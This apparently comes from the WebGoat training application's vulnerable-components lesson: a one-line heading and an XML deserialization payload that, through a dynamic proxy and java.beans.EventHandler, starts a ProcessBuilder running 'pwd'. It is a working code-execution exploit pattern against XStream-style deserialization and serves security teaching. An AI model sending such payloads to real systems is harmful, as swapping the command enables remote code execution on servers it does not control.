Open source components are the new attack vector.
<contact class='dynamic-proxy'>
<interface>org.owasp.webgoat.lessons.vulnerablecomponents.Contact</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>pwd</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
